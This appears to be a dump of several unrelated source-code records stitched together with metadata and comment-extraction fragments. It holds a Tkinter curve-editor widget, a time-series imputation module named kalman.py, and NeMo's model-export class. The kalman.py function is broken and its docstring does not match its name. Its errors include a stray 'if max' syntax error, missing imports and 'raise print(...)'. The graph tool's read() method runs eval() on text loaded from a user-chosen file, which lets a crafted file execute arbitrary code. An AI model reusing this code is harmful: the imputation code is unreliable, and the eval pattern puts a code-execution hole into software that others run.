        # NOTE(review): if neither continuous nor mousebuttonup is set and no
        # ramp was computed earlier, self.newd1ramp may not exist here.
        self.default_ramp= self.newd1ramp
def read_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Read Graph"
fileName = self.fileOpenAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.read(fileName)
def read( self,fileName):
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
fptr=open(fileName,"r")
data=fptr.readlines()
cpoints=data[0][:-1]
sensitivity=data[1]
self.d1scalewheel.set(eval(sensitivity))
if len(cpoints)==0:
return
else:
points=cpoints
self.oldpoints=[]
self.reset()
if hasattr(self,"curline"):
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
self.curovals.remove(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
if self.Smooth:
self.curline=self.canvas.create_line(eval(points),smooth=1)
else:
self.curline=self.canvas.create_line(eval(points))
self.readpoints=self.oldpoints=eval(points)[1:-1]
for p in eval(points)[1:-1]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =eval(points)[-2]
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def fileOpenAsk(self, idir=None, ifile=None, types=None,
title='Open'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.askopenfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
def write_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Write Graph"
fileName = self.fileSaveAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.write(fileName)
def write(self,fileName):
fptr=open(fileName,"w")
points= self.getControlPoints()
points.sort()
fptr.write(str(points))
fptr.write("\n")
fptr.write(str(self.d1scalewheel.get()))
fptr.close()
def fileSaveAsk(self, idir=None, ifile=None, types = None,
title='Save'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.asksaveasfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
    def reset(self):
        """Delete the current line and all control-point ovals from the canvas.

        Also drops the cached point list and the curoval/curx attributes so a
        fresh curve can be drawn from scratch.
        """
        self.canvas.delete(self.curline)
        self.oldpoints=[]
        for c in self.curovals:
            self.canvas.delete(c)
        # curoval (the most recently created/dragged oval) may not exist yet.
        if hasattr(self,"curoval"):
            self.canvas.delete(self.curoval)
        self.curovals=[]
        # Remove the transient per-drag attributes entirely so later
        # hasattr() checks elsewhere in the class see a clean state.
        if hasattr(self,"curoval"):
            delattr(self,"curoval")
        if hasattr(self,"curx"):
            delattr(self,"curx")
    def resetAll_cb(self):
        """Reset the curve to the default straight line from startpoint to endpoint.

        Restores the identity ramp (0..255), the default sensitivity, and
        clears the undo history.
        """
        self.reset()
        self.curline=self.canvas.create_line([self.startpoint,self.endpoint],width=1,fill='black')
        # Mark both anchors with small ovals.
        for p in [self.startpoint,self.endpoint]:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        self.oldpoints=[self.startpoint,self.endpoint]
        (self.curx,self.cury)=self.endpoint
        # Default thumbwheel sensitivity.
        self.d1scalewheel.set(0.013)
        if self.continuous or self.mousebuttonup:
            # Straight line corresponds to the identity ramp 0..255.
            self.newd1ramp=Numeric.arange(0,256,1,'f')
            self.callbacks.CallCallbacks(self.newd1ramp)
        #self.histvar.set(0)
        self.history=[]
    def stepBack_cb(self):
        """Undo one step: redraw the curve from the previous history entry.

        The last entry is popped from self.history; with only one entry left
        the widget is fully reset instead. Each history entry is a
        (points, sensitivity) pair.
        """
        if self.history!=[]:
            if len(self.history)==1:
                self.resetAll_cb()
            else:
                del self.history[-1]
                pns = self.history[-1][0]
                #deleting current line and ovals before redrawing
                self.oldpoints=pns
                self.canvas.delete(self.curline)
                for c in self.curovals:
                    self.canvas.delete(c)
                if hasattr(self,"curoval"):
                    self.canvas.delete(self.curoval)
                self.curovals=[]
                ###################################################
                #Some times start and end points are not deleted
                #So for deleting them canvas.find_enclosed points at
                #startpoint and endpoint are caluculated(returns alist of
                #canvas objects present there) and if the coords of
                #any canvas objects matches with start or end point that gets deleted
                #####################################################
                # Probe a 6x6 px box around the fixed start anchor (50,275).
                x = 50
                y = 275
                st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
                if st_oval_1:
                    for so in st_oval_1:
                        if so!=[]:
                            st_oval=so
                            st_oval_coords=self.canvas.coords(st_oval)
                            # coords() returns the oval bounding box; +2 recovers the center.
                            if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
                                self.canvas.delete(st_oval)
                                if st_oval in self.curovals:
                                    self.curovals.remove(st_oval)
                # Same probe for the fixed end anchor (305,20).
                x = 305
                y = 20
                end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
                if end_oval_1:
                    for eo in end_oval_1:
                        if eo!=[]:
                            end_oval=eo
                            end_oval_coords=self.canvas.coords(end_oval)
                            if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
                                self.canvas.delete(end_oval)
                                if end_oval in self.curovals:
                                    self.curovals.remove(end_oval)
                pns.sort()
                #if no start or end points, re-insert the fixed anchors
                if pns[0][0]>51 :
                    pns.insert(0,self.startpoint)
                l=len(pns)
                if pns[-1][0]<304:
                    pns.insert(l,self.endpoint)
                #if start or endpoints and points with (50 or 51) or (305 or 304)
                #coexist, drop the redundant anchor so the curve has one per edge
                if self.startpoint in pns:
                    for p in pns:
                        if p!=self.startpoint:
                            if p[0]== 50 or p[0]==51:
                                pns.remove(self.startpoint)
                if self.endpoint in pns:
                    for p in pns:
                        if p!=self.endpoint:
                            if p[0]==305 or p[0]==304:
                                pns.remove(self.endpoint)
                # NOTE: Python 2 print statement (debug output left in).
                print pns
                if self.Smooth:
                    self.curline=self.canvas.create_line(pns,width=1,fill='black',smooth=1)
                else:
                    self.curline=self.canvas.create_line(pns,width=1,fill='black')
                for p in pns:
                    self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
                    self.curovals.append(self.curoval)
                # Restore the sensitivity recorded with this history entry.
                self.d1scalewheel.set(self.history[-1][1])
                if self.continuous or self.mousebuttonup:
                    # NOTE(review): this emits the identity ramp rather than
                    # recomputing from pns -- confirm whether intentional.
                    self.newd1ramp=Numeric.arange(0,256,1,'f')
                    self.callbacks.CallCallbacks(self.newd1ramp)
                (self.curx,self.cury)=self.endpoint
    def getControlPoints(self):
        """Return the current control points, sorted, including the anchors.

        Builds self.controlpoints from self.oldpoints plus the most recently
        dragged oval (if any), then guarantees the list begins near x=50 and
        ends near x=305 by appending the fixed start/end anchors when missing.
        """
        if not self.oldpoints==[self.startpoint,self.endpoint]:
            # Strip the anchors from oldpoints; the loop re-checks membership
            # each pass in case they appear more than once.
            for i in range(len(self.oldpoints)):
                if self.startpoint in self.oldpoints:
                    self.oldpoints.remove(self.startpoint)
                if self.endpoint in self.oldpoints:
                    self.oldpoints.remove(self.endpoint)
        self.controlpoints=[]
        if hasattr(self,"curoval"):
            c=self.canvas.coords(self.curoval)
            if len(c)!=0:
                # coords() is the oval's bounding box; +2 recovers the center.
                if (int(c[0]+2),int(c[1]+2)) not in self.oldpoints and (int(c[0]+2),int(c[1]+2)) not in [self.startpoint,self.endpoint]:
                    self.controlpoints.append((int(c[0]+2),int(c[1]+2)))
        for op in self.oldpoints:
            self.controlpoints.append(op)
        self.controlpoints.sort()
        if len(self.controlpoints)>0:
            # Ensure an anchor exists at the left edge (x == 50 or 51).
            if self.controlpoints[0][0]==50 or self.controlpoints[0][0]==51 :
                pass
            else:
                self.controlpoints.append(self.startpoint)
                self.controlpoints.sort()
            # Ensure an anchor exists at the right edge (x == 304 or 305).
            if self.controlpoints[-1][0]==305 or self.controlpoints[-1][0]==304:
                pass
            else:
                self.controlpoints.append(self.endpoint)
                self.controlpoints.sort()
        return self.controlpoints
    def setControlPoints(self,points):
        """Replace the curve's control points and redraw the curve.

        Parameters
        ----------
        points : list of (x, y) tuples with x in [50, 305] and y in [20, 275].

        Raises
        ------
        AssertionError when points is not a list or a coordinate is out of range.
        """
        # NOTE: Python 2 idiom (types.ListType); assertions vanish under -O.
        assert isinstance(points, types.ListType),"Illegal type for points"
        for (x,y) in points:
            assert x in range(50,306),"coordinates are out of range,x should be in [50,305]"
            assert y in range(20,276),"coordinates are out of range,y should be in [20,275]"
        self.oldpoints=[]
        self.controlpoints=[]
        self.reset()
        # Both attributes alias the caller's list; sort() below mutates it in place.
        self.oldpoints=self.controlpoints=points
        self.controlpoints.sort()
        # Guarantee the fixed anchors are present at both ends.
        if self.controlpoints[0]!=self.startpoint:
            self.controlpoints.append(self.startpoint)
        if self.controlpoints[-1]!=self.endpoint:
            self.controlpoints.append(self.endpoint)
        self.canvas.delete(self.curline)
        self.controlpoints.sort()
        if self.Smooth:
            self.curline=self.canvas.create_line( self.controlpoints,smooth=1)
        else:
            self.curline=self.canvas.create_line( self.controlpoints)
        # Draw marker ovals for the interior points only (anchors excluded).
        for p in self.controlpoints[1:-1]:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        (self.curx,self.cury)= self.controlpoints[-2]
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
        if self.continuous or self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            self.callbacks.CallCallbacks(self.newd1ramp)
    def setSensitivity(self,val):
        """Set the sensitivity of the thumbwheel to *val*."""
        self.d1scalewheel.set(val)
    def Update(self):
        """Recompute the ramp and notify callbacks, but only when updates are
        enabled (self.update == 1)."""
        if self.update==1:
            dramp=self.caluculate_ramp()
            self.newd1ramp=dramp
            self.callbacks.CallCallbacks(dramp)
def dismiss_cb(self):
try:
if self.master.winfo_ismapped():
self.master.withdraw()
except:
if self.master.master.winfo_ismapped():
self.master.master.withdraw()
#draw Histogram
def removeHistogram(self):
"""removes Histograms"""
for b in self.bars:
self.canvas.delete(b)
self.bars=[]
    def drawHistogram(self):
        """Draw a histogram from self.histvalues (one pixel count per source
        value) as vertical gray bars behind the curve.

        Only drawn when the histogram checkbox (self.histvar) is on; the
        curve line and control-point ovals are raised back on top afterwards.
        """
        self.removeHistogram()
        if self.histvar.get():
            h=self.histvalues
            if h==[]:
                return
            list_pixels_count=h
            c=[]
            maxc=max(list_pixels_count)
            if maxc==0:
                return
            # If the peak bin is not bin 0, drop it and pad with a zero at
            # index 255 -- presumably to suppress a dominating background
            # bin; TODO confirm intent.
            if list_pixels_count.index(maxc):
                list_pixels_count.remove(maxc)
                list_pixels_count.insert(255,0)
            # Scale each of the first 256 counts to a bar height of 0..200 px.
            for i in list_pixels_count[:256]:
                max_list=max(list_pixels_count)
                if max_list==0:
                    return
                val=i*200/max_list
                c.append(val)
            # One 1-px-wide vertical bar per value; x starts at the canvas
            # left edge (50) and y grows downward from the baseline (275).
            for i in range(0,len(c)):
                x1=50+i
                x2=50+i
                y1=275-c[i]
                y2=275
                r=self.canvas.create_line([(x1,y1),(x2,y2)],fill="gray70",width=1)
                self.bars.append(r)
            #displaying line and ovals ontop
            self.canvas.tkraise(self.curline)
            for i in self.curovals:
                self.canvas.tkraise(i)
            if hasattr(self,"curoval"):
                self.canvas.tkraise(self.curoval)
            self.canvas.update()
        ##Update Histograms on Graphtool
        #if self.update!=1:
            # prev_option=self.optionType.get()
            # self.optionType.set(2)
            # self.update=1
            # self.Update()
            # self.optionType.set(prev_option)
            # self.update=0
            # return
################SMOOTHING CODE############################
def addcurve(self,out, xy, steps):
add = out.append
for i in range(1, steps+1):
t = float(i) / steps; t2 = t*t; t3 = t2*t
u = 1.0 - t; u2 = u*u; u3 = u2*u
add(xy[0]*u3 + 3*(xy[2]*t*u2 + xy[4]*t2*u) + xy[6]*t3)
add(xy[1]*u3 + 3*(xy[3]*t*u2 + xy[5]*t2*u) + xy[7]*t3)
    def smooth(self,xy, steps=12):
        """Return a smoothed flat coordinate list approximating polyline `xy`.

        `xy` is a flat list [x0, y0, x1, y1, ...]. Each segment is replaced by
        a cubic Bezier (sampled `steps` times via addcurve) whose control
        points are fixed 1/6-2/6 blends of the neighboring vertices, giving a
        C1-continuous curve. Closed polylines (first point == last point) get
        an extra segment joining the ends. Returns a new flat list.
        """
        if not xy:
            return xy
        closed = xy[0] == xy[-2] and xy[1] == xy[-1]
        out = []
        if closed:
            # connect end segment to first segment
            # (0.167 ~ 1/6, 0.833 ~ 5/6, the standard B-spline-to-Bezier blend)
            control = (
                0.500*xy[-4] + 0.500*xy[0],
                0.500*xy[-3] + 0.500*xy[1],
                0.167*xy[-4] + 0.833*xy[0],
                0.167*xy[-3] + 0.833*xy[1],
                0.833*xy[0] + 0.167*xy[2],
                0.833*xy[1] + 0.167*xy[3],
                0.500*xy[0] + 0.500*xy[2],
                0.500*xy[1] + 0.500*xy[3],
            )
            out = [control[0], control[1]]
            self.addcurve(out, control, steps)
        else:
            out = [xy[0], xy[1]]
        # One Bezier segment per input edge (pairs of coordinates).
        for i in range(0, len(xy)-4, 2):
            if i == 0 and not closed:
                # Open curve: start exactly at the first input point.
                control = (xy[i],xy[i+1],0.333*xy[i] + 0.667*xy[i+2],0.333*xy[i+1] + 0.667*xy[i+3],)
            else:
                control = (
                    0.500*xy[i] + 0.500*xy[i+2],
                    0.500*xy[i+1] + 0.500*xy[i+3],
                    0.167*xy[i] + 0.833*xy[i+2],
                    0.167*xy[i+1] + 0.833*xy[i+3],
                )
            if i == len(xy)-6 and not closed:
                # Open curve: end exactly at the last input point.
                control = control + (
                    0.667*xy[i+2] + 0.333*xy[i+4],
                    0.667*xy[i+3] + 0.333*xy[i+5],
                    xy[i+4],
                    xy[i+5],
                )
            else:
                control = control + (
                    0.833*xy[i+2] + 0.167*xy[i+4],
                    0.833*xy[i+3] + 0.167*xy[i+5],
                    0.500*xy[i+2] + 0.500*xy[i+4],
                    0.500*xy[i+3] + 0.500*xy[i+5],
                )
            # Degenerate (repeated) vertices: emit the segment endpoint
            # directly instead of sampling a zero-length Bezier.
            if ((xy[i] == xy[i+2] and xy[i+1] == xy[i+3]) or
                (xy[i+2] == xy[i+4] and xy[i+3] == xy[i+5])):
                out.append(control[6])
                out.append(control[7])
            else:
                self.addcurve(out, control, steps)
        return out
|
en
| 0.647434
|
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by ############################################################################## # # # Authors: <NAME>,<NAME> # # ############################################################################### # # # # #$Id: graphtool.py,v 1.47 2007/12/04 21:28:04 vareille Exp $ #Graph Tool is a widget with movable graph curve #app=GraphApp(root) #app.caluculate_ramp() returns current ramp #from ViewerFramework.VFCommand import Command, CommandGUI # Initialization # Create Toolbar #Curve Type #tooltip #Drawing Graph Sheet #GRAY SCALE #grays.reverse() #bottom one #left one # now set the constructor options correctly using the configure method Appends last drag point to controlpoint list if not appended by mouseleave func. when clicked on any controlpoint removes control point and draws line with remaining control points. #not in [self.startpoint,self.endpoint]: #Limiting points not to cross #not in [self.startpoint,self.endpoint] : #finding out points around the selected point #making active clickrange to be ten points around clicked point Draws line,ovals with current controlpoints. ###Limiting xcoords of the current point not to cross adjacent points #Limit graph with in the axis #adding start,end points #adding current point to list #adding oldpoints to list #removing oval point that is on drag #if points that start with 50 or 51 or 305,304 other than start ,end #points exists remove start or end points #remove ovals #finding oval for start point and endpoint ###removing start point oval ###removing end point oval #drawing line ##Adding oval when start or end point in new1points #drawing ovals ######## convert coordinates to ramp################## #if self.continuous : #scale # make sure type is set first Set widget callback. Must be callable function. 
Callback is called every time the widget value is set/modified This function is for inverting graph by reverse computing controlpoints #self.oldpoints=[] ################################################### #Some times start and end points are not deleted #So for deleting them canvas.find_enclosed points at #startpoint and endpoint are caluculated(returns alist of #canvas objects present there) and if the coords of #any canvas objects matches with start or end point that gets deleted ##################################################### draws curve with default points This function deletes current line removes current ovals Resetting curve as slant line 0 to 255 #self.histvar.set(0) when stepBack button clicked previous step is displayed.History of all the steps done is remembered and when stepback clicked from history list previous step is shown and that step is removed from history list #deleting ################################################### #Some times start and end points are not deleted #So for deleting them canvas.find_enclosed points at #startpoint and endpoint are caluculated(returns alist of #canvas objects present there) and if the coords of #any canvas objects matches with start or end point that gets deleted ##################################################### #if no start or end points #if start or endpoints and points with (50or 51) or (305or305) fuction to get current control points of the curve function to set curve control points #draw Histogram removes Histograms This function draws histogram from list of pixel counts ,one for each value in the source image #displaying line and ovals ontop ##Update Histograms on Graphtool #if self.update!=1: # prev_option=self.optionType.get() # self.optionType.set(2) # self.update=1 # self.Update() # self.optionType.set(prev_option) # self.update=0 # return ################SMOOTHING CODE############################ # connect end segment to first segment
| 2.229406
| 2
|
imputeTSpy/kalman.py
|
zaenalium/imputeTSpy
| 0
|
6628512
|
<reponame>zaenalium/imputeTSpy<filename>imputeTSpy/kalman.py
from pykalman import KalmanFilter
import numpy as np
import pandas as pd
from check_data import check_data, consecutive
from tsAirgap import ts_airgap, ts_heating, ts_nh4
def na_kalman(data, option = "linear", maxgap = None) :
    """ Missing Value Imputation by Interpolation

    Uses linear, spline or stineman interpolation to replace missing values.

    Parameters
    ----------
    data: numpy.array, list or pandas.Series
        Data to impute.
    option: str
        Interpolation method: "linear", "spline" (cubic) or "stineman".
    maxgap: int or None
        When given, runs of more than `maxgap` consecutive NaNs are left
        unfilled.

    Returns
    -------
    numpy.array
        Imputed data.

    Raises
    ------
    ValueError
        If `option` is not one of the supported methods.

    Examples
    ------

    import imputeTSpy

    data = imputeTSpy.ts_nh4()

    data_fill = imputeTSpy.na_kalman(data)
    """
    # Local import: interp1d was referenced but never imported at module level.
    from scipy.interpolate import interp1d

    # (A stray, syntactically invalid "if max" line was removed here.)
    x = check_data(data)

    idx = np.arange(x.shape[0])
    nan_idx = idx[np.isnan(x)]

    if maxgap is not None :
        # Exclude NaN runs longer than maxgap from the fill set.
        z = consecutive(nan_idx)
        exc = []
        for i in range(len(z)) :
            if len(z[i]) > maxgap :
                exc.extend(z[i])
        nan_idx = nan_idx[np.isin(nan_idx, exc) == False]

    # Indices of observed (non-imputed) samples used as interpolation knots.
    obs = np.isin(idx, nan_idx) == False
    if option == "linear" :
        f = interp1d(idx[obs], x[obs])
        intrep_val = f(idx)
    elif option == "spline" :
        f = interp1d(idx[obs], x[obs], kind= "cubic" )
        intrep_val = f(idx)
    elif option == "stineman" :
        # NOTE(review): stineman_interp is not imported in this module either;
        # it must be supplied by the environment (e.g. old matplotlib.mlab).
        intrep_val = stineman_interp(idx , idx[obs], x[obs], yp = None)
    else :
        # Was `raise print(...)`, which raises a TypeError on None instead of
        # reporting the real problem.
        raise ValueError("Please fill the valid option!!!")

    x[nan_idx] = intrep_val[nan_idx]
    return x
from pykalman import KalmanFilter
import numpy as np
import matplotlib.pyplot as plt
from numpy import ma

# Demo script: 1-D constant-acceleration Kalman filter over a position log,
# optionally masking a stretch of samples to simulate missing observations.

# enable or disable missing observations
use_mask = 1

# reading data (quick and dirty)
# NOTE(review): the file handle from open() is never closed and the file is
# expected as "time;position" lines -- acceptable for a throwaway script.
Time=[]
X=[]
for line in open('data/dataset_01.csv'):
    f1, f2 = line.split(';')
    Time.append(float(f1))
    X.append(float(f2))

if (use_mask):
    X = ma.asarray(X)
    # Mask samples 300..499; pykalman treats masked entries as missing.
    X[300:500] = ma.masked

# Filter Configuration

# time step (assumed constant across the whole log)
dt = Time[2] - Time[1]

# transition_matrix: state is [position, velocity, acceleration]
F = [[1,  dt,   0.5*dt*dt],
     [0,   1,          dt],
     [0,   0,           1]]

# observation_matrix: only position is measured
H = [1, 0, 0]

# transition_covariance
Q = [[   1,     0,     0],
     [   0,  1e-4,     0],
     [   0,     0,  1e-6]]

# observation_covariance
R = [0.04] # max error = 0.6m

# initial_state_mean
X0 = [0,
      0,
      0]

# initial_state_covariance
P0 = [[ 10,    0,   0],
      [  0,    1,   0],
      [  0,    0,   1]]

n_timesteps = len(Time)
n_dim_state = 3

filtered_state_means = np.zeros((n_timesteps, n_dim_state))
filtered_state_covariances = np.zeros((n_timesteps, n_dim_state, n_dim_state))

# Kalman-Filter initialization
kf = KalmanFilter(transition_matrices = F,
                  observation_matrices = H,
                  transition_covariance = Q,
                  observation_covariance = R,
                  initial_state_mean = X0,
                  initial_state_covariance = P0)


# iterative estimation for each new measurement
for t in range(n_timesteps):
    if t == 0:
        filtered_state_means[t] = X0
        filtered_state_covariances[t] = P0
    else:
        # filter_update performs one predict+correct step given the previous
        # posterior; a masked observation triggers prediction only.
        filtered_state_means[t], filtered_state_covariances[t] = (
            kf.filter_update(
                filtered_state_means[t-1],
                filtered_state_covariances[t-1],
                observation = X[t])
        )

# 1-sigma band for the position component (variance at index [0,0]).
position_sigma = np.sqrt(filtered_state_covariances[:, 0, 0]);

# plot of the resulted trajectory
plt.plot(Time, filtered_state_means[:, 0], "g-", label="Filtered position", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] + position_sigma, "r--", label="+ sigma", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] - position_sigma, "r--", label="- sigma", markersize=1)
plt.grid()
plt.legend(loc="upper left")
plt.xlabel("Time (s)")
plt.ylabel("Position (m)")
plt.show()
|
from pykalman import KalmanFilter
import numpy as np
import pandas as pd
from check_data import check_data, consecutive
from tsAirgap import ts_airgap, ts_heating, ts_nh4
def na_kalman(data, option = "linear", maxgap = None) :
""" Missing Value Imputation by Interpolation
Uses linear, spline or stineman interpolation to replace missing values.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
Returns
-------
numpy.array
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
if max
x = check_data(data)
idx = np.arange(x.shape[0])
nan_idx = idx[np.isnan(x)]
if maxgap != None :
z = consecutive(nan_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_idx = nan_idx[np.isin(nan_idx, exc) == False]
else :
pass
if option == "linear" :
f = interp1d(idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False] )
intrep_val = f(idx)
elif option == "spline" :
f = interp1d(idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False], kind= "cubic" )
intrep_val = f(idx)
elif option == "stineman" :
intrep_val = stineman_interp(idx , idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False], yp = None)
else :
raise print("Please fill the valid option!!!")
x[nan_idx] = intrep_val[nan_idx]
return x
from pykalman import KalmanFilter
import numpy as np
import matplotlib.pyplot as plt
from numpy import ma
# enable or disable missing observations
use_mask = 1
# reading data (quick and dirty)
Time=[]
X=[]
for line in open('data/dataset_01.csv'):
f1, f2 = line.split(';')
Time.append(float(f1))
X.append(float(f2))
if (use_mask):
X = ma.asarray(X)
X[300:500] = ma.masked
# Filter Configuration
# time step
dt = Time[2] - Time[1]
# transition_matrix
F = [[1, dt, 0.5*dt*dt],
[0, 1, dt],
[0, 0, 1]]
# observation_matrix
H = [1, 0, 0]
# transition_covariance
Q = [[ 1, 0, 0],
[ 0, 1e-4, 0],
[ 0, 0, 1e-6]]
# observation_covariance
R = [0.04] # max error = 0.6m
# initial_state_mean
X0 = [0,
0,
0]
# initial_state_covariance
P0 = [[ 10, 0, 0],
[ 0, 1, 0],
[ 0, 0, 1]]
n_timesteps = len(Time)
n_dim_state = 3
filtered_state_means = np.zeros((n_timesteps, n_dim_state))
filtered_state_covariances = np.zeros((n_timesteps, n_dim_state, n_dim_state))
# Kalman-Filter initialization
kf = KalmanFilter(transition_matrices = F,
observation_matrices = H,
transition_covariance = Q,
observation_covariance = R,
initial_state_mean = X0,
initial_state_covariance = P0)
# iterative estimation for each new measurement
for t in range(n_timesteps):
if t == 0:
filtered_state_means[t] = X0
filtered_state_covariances[t] = P0
else:
filtered_state_means[t], filtered_state_covariances[t] = (
kf.filter_update(
filtered_state_means[t-1],
filtered_state_covariances[t-1],
observation = X[t])
)
position_sigma = np.sqrt(filtered_state_covariances[:, 0, 0]);
# plot of the resulted trajectory
plt.plot(Time, filtered_state_means[:, 0], "g-", label="Filtered position", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] + position_sigma, "r--", label="+ sigma", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] - position_sigma, "r--", label="- sigma", markersize=1)
plt.grid()
plt.legend(loc="upper left")
plt.xlabel("Time (s)")
plt.ylabel("Position (m)")
plt.show()
|
en
| 0.442255
|
Missing Value Imputation by Interpolation Uses linear, spline or stineman interpolation to replace missing values. Parameters ---------- data: numpy.array, list or pandas.Series Data to impute. Returns ------- numpy.array Imputed data. Examples ------ import imputeTSpy data = imputeTSpy.ts_nh4() data_fill_locf = imputeTSpy.locf(data) data_fill_nocb = imputeTSpy.nocb(data) # enable or disable missing observations # reading data (quick and dirty) # Filter Configuration # time step # transition_matrix # observation_matrix # transition_covariance # observation_covariance # max error = 0.6m # initial_state_mean # initial_state_covariance # Kalman-Filter initialization # iterative estimation for each new measurement # plot of the resulted trajectory
| 2.955677
| 3
|
nemo/core/classes/exportable.py
|
hamjam/NeMo
| 1
|
6628513
|
<filename>nemo/core/classes/exportable.py
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC
import onnx
import torch
from torch.onnx import ExportTypes, TrainingMode
from nemo.core.classes import typecheck
from nemo.core.utils.neural_type_utils import get_dynamic_axes, get_io_names
from nemo.utils import logging
from nemo.utils.export_utils import (
ExportFormat,
augment_filename,
get_export_format,
parse_input_example,
replace_for_export,
verify_runtime,
wrap_forward_method,
)
__all__ = ['ExportFormat', 'Exportable']
class Exportable(ABC):
    """
    This Interface should be implemented by particular classes derived from nemo.core.NeuralModule or nemo.core.ModelPT.
    It gives these entities ability to be exported for deployment to formats such as ONNX.
    """

    @property
    def input_module(self):
        return self

    @property
    def output_module(self):
        return self

    def export(
        self,
        output: str,
        input_example=None,
        verbose=False,
        export_params=True,
        do_constant_folding=True,
        onnx_opset_version=None,
        try_script: bool = False,
        training=TrainingMode.EVAL,
        check_trace: bool = False,
        use_dynamic_axes: bool = True,
        dynamic_axes=None,
        check_tolerance=0.01,
    ):
        """Export this module to TorchScript or ONNX (inferred from `output`'s
        extension). Returns ([output_path], [description])."""
        my_args = locals().copy()
        my_args.pop('self')

        exportables = []
        for m in self.modules():
            if isinstance(m, Exportable):
                exportables.append(m)

        qual_name = self.__module__ + '.' + self.__class__.__qualname__
        format = get_export_format(output)
        output_descr = f"{qual_name} exported to {format}"

        # Pytorch's default for None is too low, can't pass None through
        if onnx_opset_version is None:
            onnx_opset_version = 13

        try:
            # Disable typechecks
            typecheck.set_typecheck_enabled(enabled=False)

            # Allow user to completely override forward method to export
            forward_method, old_forward_method = wrap_forward_method(self)

            # Set module mode
            with torch.onnx.select_model_mode_for_export(
                self, training
            ), torch.inference_mode(), torch.jit.optimized_execution(True):

                if input_example is None:
                    input_example = self.input_module.input_example()

                # Remove i/o examples from args we propagate to enclosed Exportables
                my_args.pop('output')
                my_args.pop('input_example')

                # Run (possibly overridden) prepare methods before calling forward()
                for ex in exportables:
                    ex._prepare_for_export(**my_args, noreplace=True)
                self._prepare_for_export(output=output, input_example=input_example, **my_args)

                input_list, input_dict = parse_input_example(input_example)
                input_names = self.input_names
                output_names = self.output_names
                output_example = tuple(self.forward(*input_list, **input_dict))

                jitted_model = None
                if try_script:
                    try:
                        jitted_model = torch.jit.script(self)
                    except Exception as e:
                        # BUGFIX: was f"jit.script() failed!\{e}" — the stray
                        # backslash logged a literal '\' instead of a newline.
                        logging.error(f"jit.script() failed!\n{e}")

                if format == ExportFormat.TORCHSCRIPT:
                    if jitted_model is None:
                        jitted_model = torch.jit.trace_module(
                            self,
                            {"forward": tuple(input_list) + tuple(input_dict.values())},
                            strict=True,
                            check_trace=check_trace,
                            check_tolerance=check_tolerance,
                        )
                    if not self.training:
                        jitted_model = torch.jit.optimize_for_inference(jitted_model)
                    if verbose:
                        logging.info(f"JIT code:\n{jitted_model.code}")
                    jitted_model.save(output)
                    assert os.path.exists(output)
                elif format == ExportFormat.ONNX:
                    if jitted_model is None:
                        jitted_model = self

                    # dynamic axis is a mapping from input/output_name => list of "dynamic" indices
                    if dynamic_axes is None and use_dynamic_axes:
                        dynamic_axes = get_dynamic_axes(self.input_module.input_types, input_names)
                        dynamic_axes.update(get_dynamic_axes(self.output_module.output_types, output_names))

                    torch.onnx.export(
                        jitted_model,
                        input_example,
                        output,
                        input_names=input_names,
                        output_names=output_names,
                        verbose=verbose,
                        export_params=export_params,
                        do_constant_folding=do_constant_folding,
                        dynamic_axes=dynamic_axes,
                        opset_version=onnx_opset_version,
                    )

                    if check_trace:
                        verify_runtime(output, input_list, input_dict, input_names, output_names, output_example)

                else:
                    raise ValueError(f'Encountered unknown export format {format}.')
        finally:
            typecheck.set_typecheck_enabled(enabled=True)
